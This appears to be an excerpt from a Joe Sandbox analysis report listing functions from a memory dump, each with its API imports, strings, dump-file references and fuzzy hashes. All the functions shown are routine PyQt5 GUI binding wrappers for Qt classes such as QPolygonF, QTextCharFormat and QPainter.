Opcode Fuzzy Hash: 56a6bdd1ad3201535844c73f25a96c05d2326ef91820abe45a685d308ee7f7c8
Instruction Fuzzy Hash: 2421F976B08B4681EB009F15F8982A973B4FB88BA4F544132DA9D47774DF3CD949C740

Function 00007FFD86222FE0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON

Download Yara Rule

APIs

?contains@?$QVector@VQPointF@@@@QEBA_NAEBVQPointF@@@Z.QT5CORE ref: 00007FFD86223055
PyBool_FromLong.PYTHON3 ref: 00007FFD86223085

Strings

contains(self, value: Union[QPointF, QPoint]) -> bool, xrefs: 00007FFD8622309C
contains, xrefs: 00007FFD862230A8
QPolygonF, xrefs: 00007FFD862230AF
BJ1, xrefs: 00007FFD86222FF5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Point$?contains@?$Bool_F@@@F@@@@FromLongVector@
String ID: BJ1$QPolygonF$contains$contains(self, value: Union[QPointF, QPoint]) -> bool
API String ID: 637766274-734736879
Opcode ID: c95df9393b6aec6abdc82c1f117beab673a08a4bba9def3db30e5d6cb4f3bbe2
Instruction ID: 9ea925f85d0bdb2a2f3611a488cbb438639521d1045c584aae830ebb93b41436
Opcode Fuzzy Hash: c95df9393b6aec6abdc82c1f117beab673a08a4bba9def3db30e5d6cb4f3bbe2
Instruction Fuzzy Hash: E2211576B08B86C1DB509F55E8985AD33A8FB48BA0F954076CA9E43320EF3DD958C740

Function 00007FFD86252F60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFD86252FCF
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD86252FE2
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86252FED

Strings

setRightBorderStyle, xrefs: 00007FFD86253024
QTextTableCellFormat, xrefs: 00007FFD8625302B
setRightBorderStyle(self, style: QTextFrameFormat.BorderStyle), xrefs: 00007FFD86253015

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextTableCellFormat$setRightBorderStyle$setRightBorderStyle(self, style: QTextFrameFormat.BorderStyle)
API String ID: 3865857979-609059950
Opcode ID: 055cb24849a6074d3ad788fee4e0ce59cb0c67fe63edcfa460fdbcbef80c4a8d
Instruction ID: 81ea81ab41b61382e0023ff829711fe0df2b82b145cf15e1b7787f932f23f63b
Opcode Fuzzy Hash: 055cb24849a6074d3ad788fee4e0ce59cb0c67fe63edcfa460fdbcbef80c4a8d
Instruction Fuzzy Hash: 91211875B08B4A91DB10DF15E8986AD33B4FB88798F954132CA8D43720EF3DE90AC740

Function 00007FFD86284C60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFD86284CCF
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD86284CE2
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86284CED

Strings

setFontStyleStrategy(self, strategy: QFont.StyleStrategy), xrefs: 00007FFD86284D15
setFontStyleStrategy, xrefs: 00007FFD86284D24
QTextCharFormat, xrefs: 00007FFD86284D2B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextCharFormat$setFontStyleStrategy$setFontStyleStrategy(self, strategy: QFont.StyleStrategy)
API String ID: 3865857979-2745544447
Opcode ID: f4ce86132a1159b860758f349f86dda29712aec9259fe9ec50bc52d06244e649
Instruction ID: 35d25b3a37d5b16cf9dcb10979c06aaee029be99c8b1db348550dfcb2e77e1b4
Opcode Fuzzy Hash: f4ce86132a1159b860758f349f86dda29712aec9259fe9ec50bc52d06244e649
Instruction Fuzzy Hash: A6211875B08B4A91DB10DF55E8A86AE33B4FB48BA4F954132CA8D43720DF3DE949C740

Function 00007FFD8627ED60 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?isActive@QPainter@@QEBA_NXZ.QT5GUI ref: 00007FFD8627EDAA
PyErr_SetString.PYTHON3 ref: 00007FFD8627EDD6

Strings

__enter__, xrefs: 00007FFD8627EDF8
QPainter, xrefs: 00007FFD8627EDFF
QPainter must be created with a device, xrefs: 00007FFD8627EDCC
__enter__(self) -> Any, xrefs: 00007FFD8627EDEC

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Active@Err_Painter@@String
String ID: QPainter$QPainter must be created with a device$__enter__$__enter__(self) -> Any
API String ID: 3725559064-837745504
Opcode ID: 24e67ac2ef5697dbf8d912af156b98e6a772ae7b5ac9fb274ca347489b9596e3
Instruction ID: 020905db2bfcca9fcd821aeb983ccbcdb7285c551ce916940eb35045ed2cf7b1
Opcode Fuzzy Hash: 24e67ac2ef5697dbf8d912af156b98e6a772ae7b5ac9fb274ca347489b9596e3
Instruction Fuzzy Hash: C1116A75B18A4681EB009F15E8A84A873A8FF88BA4F590072CE5C47320DF7CE999C340

Function 00007FFD86286240 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFD862862AF
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD862862C2
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD862862CD

Strings

setFontHintingPreference, xrefs: 00007FFD86286304
setFontHintingPreference(self, hintingPreference: QFont.HintingPreference), xrefs: 00007FFD862862F5
QTextCharFormat, xrefs: 00007FFD8628630B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextCharFormat$setFontHintingPreference$setFontHintingPreference(self, hintingPreference: QFont.HintingPreference)
API String ID: 3865857979-1652171566
Opcode ID: 06b607596b38fffdf9c98f6339a7b35962ec1f9d74e2d2155301479777f1b2cc
Instruction ID: ed96ca82f78524597a35a3f5df08c0f2dcdbb4b40d9681acff433f82eb10175a
Opcode Fuzzy Hash: 06b607596b38fffdf9c98f6339a7b35962ec1f9d74e2d2155301479777f1b2cc
Instruction Fuzzy Hash: 82211536B08B4A91EB10DF55E8996AD33B4FB88BA4F944032CA9D43724DF3DD94AC740

Function 00007FFD86232A70 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

?xToCursor@QTextLine@@QEBAHNW4CursorPosition@1@@Z.QT5GUI ref: 00007FFD86232AFC
PyLong_FromLong.PYTHON3 ref: 00007FFD86232B04

Strings

xToCursor(self, x: float, edge: QTextLine.CursorPosition = QTextLine.CursorBetweenCharacters) -> int, xrefs: 00007FFD86232B19
xToCursor, xrefs: 00007FFD86232B25
Bd|E, xrefs: 00007FFD86232ABD
QTextLine, xrefs: 00007FFD86232B2C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: CursorCursor@FromLine@@LongLong_Position@1@@Text
String ID: Bd|E$QTextLine$xToCursor$xToCursor(self, x: float, edge: QTextLine.CursorPosition = QTextLine.CursorBetweenCharacters) -> int
API String ID: 3285523414-1648113342
Opcode ID: 1ff85229e6eca3736d60275b0ad273f4d2d62d413900573a97e87e39c8382f56
Instruction ID: 5dbf87bb9ea7dcdde5be98c66451ee9bd48f5d495006754f4ebcc7f40badb25e
Opcode Fuzzy Hash: 1ff85229e6eca3736d60275b0ad273f4d2d62d413900573a97e87e39c8382f56
Instruction Fuzzy Hash: 7921E536B0CF5585EB009F24E8983AD33A8FB487A0F924136CAAD43720EF39D959C700

Function 00007FFD862B2AA0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

?containsPoint@QPolygonF@@QEBA_NAEBVQPointF@@W4FillRule@Qt@@@Z.QT5GUI ref: 00007FFD862B2B33
PyBool_FromLong.PYTHON3 ref: 00007FFD862B2B60

Strings

containsPoint(self, pt: Union[QPointF, QPoint], fillRule: Qt.FillRule) -> bool, xrefs: 00007FFD862B2B7D
BJ1E, xrefs: 00007FFD862B2AB8
containsPoint, xrefs: 00007FFD862B2B89
QPolygonF, xrefs: 00007FFD862B2B90

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?containsBool_FillFromLongPointPoint@PolygonQt@@@Rule@
String ID: BJ1E$QPolygonF$containsPoint$containsPoint(self, pt: Union[QPointF, QPoint], fillRule: Qt.FillRule) -> bool
API String ID: 1908349894-3098100398
Opcode ID: 5715472e1ce31f0816930d95af27e20810dc251f0f085d96fda4a577a77dbd33
Instruction ID: e6371c733fee612ad4ba00e5513d22b95764eebcade00cb13611420829136fd1
Opcode Fuzzy Hash: 5715472e1ce31f0816930d95af27e20810dc251f0f085d96fda4a577a77dbd33
Instruction Fuzzy Hash: AF21C53AB19F9586DB508F15E8987AD33A8FB487A0F524176CA9D43720EF39D858C740

Function 00007FFD86260E40 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?format@QTextObject@@QEBA?AVQTextFormat@@XZ.QT5GUI ref: 00007FFD86260EA2
?toBlockFormat@QTextFormat@@QEBA?AVQTextBlockFormat@@XZ.QT5GUI ref: 00007FFD86260EAE
??1QTextFormat@@QEAA@XZ.QT5GUI ref: 00007FFD86260EB9

Strings

QTextTable, xrefs: 00007FFD86260EFD
format, xrefs: 00007FFD86260EF6
format(self) -> QTextTableFormat, xrefs: 00007FFD86260EEA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$Format@@$Block$?format@Format@Object@@malloc
String ID: QTextTable$format$format(self) -> QTextTableFormat
API String ID: 3991213356-2853976049
Opcode ID: d97e6ec0b0eddfc3bc9d08cb6bd6a95023b3e21f4cea61e16cb5a3d43363194a
Instruction ID: 4661e1ccec0efe592d0a1466d342c07da1c5feb12d169c313c6f4de7d56f053d
Opcode Fuzzy Hash: d97e6ec0b0eddfc3bc9d08cb6bd6a95023b3e21f4cea61e16cb5a3d43363194a
Instruction Fuzzy Hash: FB114C75B18B4682EB00DF15E8686AD73A4FF88BA4F941072DA4E03760DF3DD949C740

Function 00007FFD8624EAC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@N@Z.QT5CORE ref: 00007FFD8624EB26
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD8624EB39
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD8624EB44

Strings

QTextTableCellFormat, xrefs: 00007FFD8624EB82
setRightPadding(self, padding: float), xrefs: 00007FFD8624EB6C
setRightPadding, xrefs: 00007FFD8624EB7B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextTableCellFormat$setRightPadding$setRightPadding(self, padding: float)
API String ID: 3865857979-3744716229
Opcode ID: 2441ada3b2fdc9ffbb213bb2fa16b0acb9e3eb1bcdddbba441d1fa165f017312
Instruction ID: dda7b3ac946828e173fc54b5efaa0241ceff3247dde6e81c955c3236b0948f26
Opcode Fuzzy Hash: 2441ada3b2fdc9ffbb213bb2fa16b0acb9e3eb1bcdddbba441d1fa165f017312
Instruction Fuzzy Hash: DF210876B08B4AD1EB109F15E8996AD33B4FB48BA4F954032CA8E03720DF3DD95AC740

